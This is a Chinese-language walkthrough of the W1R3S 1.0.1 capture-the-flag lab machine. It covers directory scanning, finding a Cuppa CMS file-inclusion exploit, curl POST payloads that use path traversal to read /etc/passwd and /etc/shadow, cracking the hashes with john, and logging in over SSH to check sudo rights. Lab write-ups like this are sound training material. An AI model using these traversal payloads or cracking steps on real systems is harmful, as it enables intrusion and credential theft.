W1R3S 1.0.1







这个泄露了员工姓名和对应职位,其他的文件都没看出什么信息
## 尝试登录mysql
不允许远程登录(这里我网络环境变了,靶机ip也变了)

## 渗透80端口
前面得到wordpress页面,拼接访问

无论点击哪个按钮都会跳转到localhost

扫目录,看看有没有新的突破口
`dirsearch -u http://192.168.128.58 --json-report=result`

得到很多路径,拼接访问。有个cuppa cms的安装页面

点击next往下安装,安装成功但是创建用户失败

查有没有历史漏洞
`searchsploit cuppa cms`

把exp复制到当前目录
`searchsploit -m 25971.txt`

里面列出访问路径,漏洞出现行,文件包含漏洞,exp示范。有本地任意文件包含,能实现任意文件读取
尝试拼接访问,404

往administrator目录后拼接,404

删掉/cuppa后往administrator拼接,访问成功但是没内容返回

到网上找cms源码看看

要post方式传参
`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/passwd"`

`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/shadow"`

将有哈希的保存到一个文件,然后用john爆破,`john shadowtest --wordlist /usr/share/wordlists/rockyou.txt`。等待运行完毕使用`john --show shadow文件名`查看

## ssh连接
得到密码后通过ssh连接靶机,`ssh username@ip`

查看当前权限,可以看到用sudo命令权限
`id`

查看可以sudo执行的命令,3个ALL相当于root权限
`sudo -l`

